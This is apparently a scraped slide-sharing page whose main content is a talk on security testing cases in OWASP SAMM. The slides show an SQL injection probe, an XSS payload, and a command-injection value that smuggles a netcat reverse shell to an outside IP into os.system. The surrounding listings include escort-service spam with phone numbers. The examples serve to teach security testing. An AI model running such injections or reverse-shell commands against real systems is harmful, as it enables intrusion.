Regression analysis: Simple Linear Regression Multiple Linear RegressionRavindra Nath Shukla
 
Sales & Marketing Alignment: How to Synergize for Success
Sales & Marketing Alignment: How to Synergize for SuccessSales & Marketing Alignment: How to Synergize for Success
Sales & Marketing Alignment: How to Synergize for SuccessAggregage
 
A DAY IN THE LIFE OF A SALESMAN / WOMAN
A DAY IN THE LIFE OF A SALESMAN / WOMANA DAY IN THE LIFE OF A SALESMAN / WOMAN
A DAY IN THE LIFE OF A SALESMAN / WOMANIlamathiKannappan
 
Lucknow 💋 Escorts in Lucknow - 450+ Call Girl Cash Payment 8923113531 Neha Th...
Lucknow 💋 Escorts in Lucknow - 450+ Call Girl Cash Payment 8923113531 Neha Th...Lucknow 💋 Escorts in Lucknow - 450+ Call Girl Cash Payment 8923113531 Neha Th...
Lucknow 💋 Escorts in Lucknow - 450+ Call Girl Cash Payment 8923113531 Neha Th...anilsa9823
 
Russian Faridabad Call Girls(Badarpur) : ☎ 8168257667, @4999
Russian Faridabad Call Girls(Badarpur) : ☎ 8168257667, @4999Russian Faridabad Call Girls(Badarpur) : ☎ 8168257667, @4999
Russian Faridabad Call Girls(Badarpur) : ☎ 8168257667, @4999Tina Ji
 

Recently uploaded (20)

Insurers' journeys to build a mastery in the IoT usage
Insurers' journeys to build a mastery in the IoT usageInsurers' journeys to build a mastery in the IoT usage
Insurers' journeys to build a mastery in the IoT usage
 
Best Basmati Rice Manufacturers in India
Best Basmati Rice Manufacturers in IndiaBest Basmati Rice Manufacturers in India
Best Basmati Rice Manufacturers in India
 
Pharma Works Profile of Karan Communications
Pharma Works Profile of Karan CommunicationsPharma Works Profile of Karan Communications
Pharma Works Profile of Karan Communications
 
Cash Payment 9602870969 Escort Service in Udaipur Call Girls
Cash Payment 9602870969 Escort Service in Udaipur Call GirlsCash Payment 9602870969 Escort Service in Udaipur Call Girls
Cash Payment 9602870969 Escort Service in Udaipur Call Girls
 
Call Girls In DLf Gurgaon ➥99902@11544 ( Best price)100% Genuine Escort In 24...
Call Girls In DLf Gurgaon ➥99902@11544 ( Best price)100% Genuine Escort In 24...Call Girls In DLf Gurgaon ➥99902@11544 ( Best price)100% Genuine Escort In 24...
Call Girls In DLf Gurgaon ➥99902@11544 ( Best price)100% Genuine Escort In 24...
 
0183760ssssssssssssssssssssssssssss00101011 (27).pdf
0183760ssssssssssssssssssssssssssss00101011 (27).pdf0183760ssssssssssssssssssssssssssss00101011 (27).pdf
0183760ssssssssssssssssssssssssssss00101011 (27).pdf
 
Creating Low-Code Loan Applications using the Trisotech Mortgage Feature Set
Creating Low-Code Loan Applications using the Trisotech Mortgage Feature SetCreating Low-Code Loan Applications using the Trisotech Mortgage Feature Set
Creating Low-Code Loan Applications using the Trisotech Mortgage Feature Set
 
Keppel Ltd. 1Q 2024 Business Update Presentation Slides
Keppel Ltd. 1Q 2024 Business Update Presentation SlidesKeppel Ltd. 1Q 2024 Business Update Presentation Slides
Keppel Ltd. 1Q 2024 Business Update Presentation Slides
 
Call Girls in Gomti Nagar - 7388211116 - With room Service
Call Girls in Gomti Nagar - 7388211116 - With room ServiceCall Girls in Gomti Nagar - 7388211116 - With room Service
Call Girls in Gomti Nagar - 7388211116 - With room Service
 
Unlocking the Secrets of Affiliate Marketing.pdf
Unlocking the Secrets of Affiliate Marketing.pdfUnlocking the Secrets of Affiliate Marketing.pdf
Unlocking the Secrets of Affiliate Marketing.pdf
 
It will be International Nurses' Day on 12 May
It will be International Nurses' Day on 12 MayIt will be International Nurses' Day on 12 May
It will be International Nurses' Day on 12 May
 
Ensure the security of your HCL environment by applying the Zero Trust princi...
Ensure the security of your HCL environment by applying the Zero Trust princi...Ensure the security of your HCL environment by applying the Zero Trust princi...
Ensure the security of your HCL environment by applying the Zero Trust princi...
 
VVVIP Call Girls In Greater Kailash ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Greater Kailash ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...VVVIP Call Girls In Greater Kailash ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Greater Kailash ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
 
Mondelez State of Snacking and Future Trends 2023
Mondelez State of Snacking and Future Trends 2023Mondelez State of Snacking and Future Trends 2023
Mondelez State of Snacking and Future Trends 2023
 
7.pdf This presentation captures many uses and the significance of the number...
7.pdf This presentation captures many uses and the significance of the number...7.pdf This presentation captures many uses and the significance of the number...
7.pdf This presentation captures many uses and the significance of the number...
 
Regression analysis: Simple Linear Regression Multiple Linear Regression
Regression analysis: Simple Linear Regression Multiple Linear RegressionRegression analysis: Simple Linear Regression Multiple Linear Regression
Regression analysis: Simple Linear Regression Multiple Linear Regression
 
Sales & Marketing Alignment: How to Synergize for Success
Sales & Marketing Alignment: How to Synergize for SuccessSales & Marketing Alignment: How to Synergize for Success
Sales & Marketing Alignment: How to Synergize for Success
 
A DAY IN THE LIFE OF A SALESMAN / WOMAN
A DAY IN THE LIFE OF A SALESMAN / WOMANA DAY IN THE LIFE OF A SALESMAN / WOMAN
A DAY IN THE LIFE OF A SALESMAN / WOMAN
 
Lucknow 💋 Escorts in Lucknow - 450+ Call Girl Cash Payment 8923113531 Neha Th...
Lucknow 💋 Escorts in Lucknow - 450+ Call Girl Cash Payment 8923113531 Neha Th...Lucknow 💋 Escorts in Lucknow - 450+ Call Girl Cash Payment 8923113531 Neha Th...
Lucknow 💋 Escorts in Lucknow - 450+ Call Girl Cash Payment 8923113531 Neha Th...
 
Russian Faridabad Call Girls(Badarpur) : ☎ 8168257667, @4999
Russian Faridabad Call Girls(Badarpur) : ☎ 8168257667, @4999Russian Faridabad Call Girls(Badarpur) : ☎ 8168257667, @4999
Russian Faridabad Call Girls(Badarpur) : ☎ 8168257667, @4999
 

ОЛЕКСІЙ БАРАНОВСЬКИЙ  "Роль та кейси тестування в моделі OWASP SAMM"  

  • 1. Testing cases in OWASP SAMM OLEKSII BARANOVSKYI
  • 2. My vision  Security isn’t a miracle  There is no lack in “security testing” there is a lack of “testing security”  Traditional testing is more more formalized, manageable and difficult. WHY?
  • 3.
  • 4. OWASP SAMM The Open Web Application Security Project Software Assurance Maturity Model
  • 5. Postures  Evaluating an organization’s existing software security practices.  Building a balanced software security assurance program in well-defined iterations.  Demonstrating concrete improvements to a security assurance program.  Defining and measuring security-related activities throughout an organization.
  • 6. Why we need to use it? Users: Software development company Enterprise
  • 9. Case 1. It’s not about security
  • 10. SAMM
  • 11. Case 2. SQLinj Example http://site.com/test/test.php?id=434
  • 12. Case 2. SQLinj Example http://site.com/test/test.php?id=434’
  • 13. SAMM
  • 14. Case 3. SetUID Example import os cmd = './date.sh ' + param1 os.system(cmd)
  • 15. Case 3. SetUID Example import os cmd = './date.sh ' + ’0.0.0; nc –e /bin/bash 5.10.114.4 8080' os.system(cmd) * Thanks to Yurii Bilyk
  • 16. SAMM
  • 17. Case 4. XSS Example <script>alert(‘ok’);</script> "'}})}}})});alert(ok'); window.addEventListener('load', function() { new Vue({ methods:{ filter:function(){$.ajax({data:{a:'"
  • 18. SAMM and where should we start?
  • 20. Case 5. HTTPS example Requirement: Server and client should communicate via HTTP protocol. Requirement: Server and client should communicate via HTTPS protocol. Requirement: Server and client should communicate via HTTP with way that excludes the disclosure of critical information.
  • 21. SAMM and where should we start?
  • 22. Conclusions  Security really is not a miracle  Security testing is a part of global testing coverage  SAMM is a step from dedicated security testing to TMM and EAAF
  • 23. Thanks a lot! Any additional questions?
  • 24. Stay secure and mature! HTTPS://WWW.FACEBOOK.COM/OLEKSII.BARANOVSKYI HTTPS://WWW.LINKEDIN.COM/IN/OLEKSIIBARANOVSKYI/